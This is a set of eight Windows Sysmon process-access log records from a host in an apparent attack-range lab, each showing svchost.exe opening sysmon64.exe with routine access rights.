{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1410,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.167\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.167","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1411,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.167\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.167","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1412,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.167\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.167","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1413,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.167\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.167","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1414,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.167\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.167","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1415,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.170\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.170","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1416,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.170\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.170","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1417,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.170\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.170","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
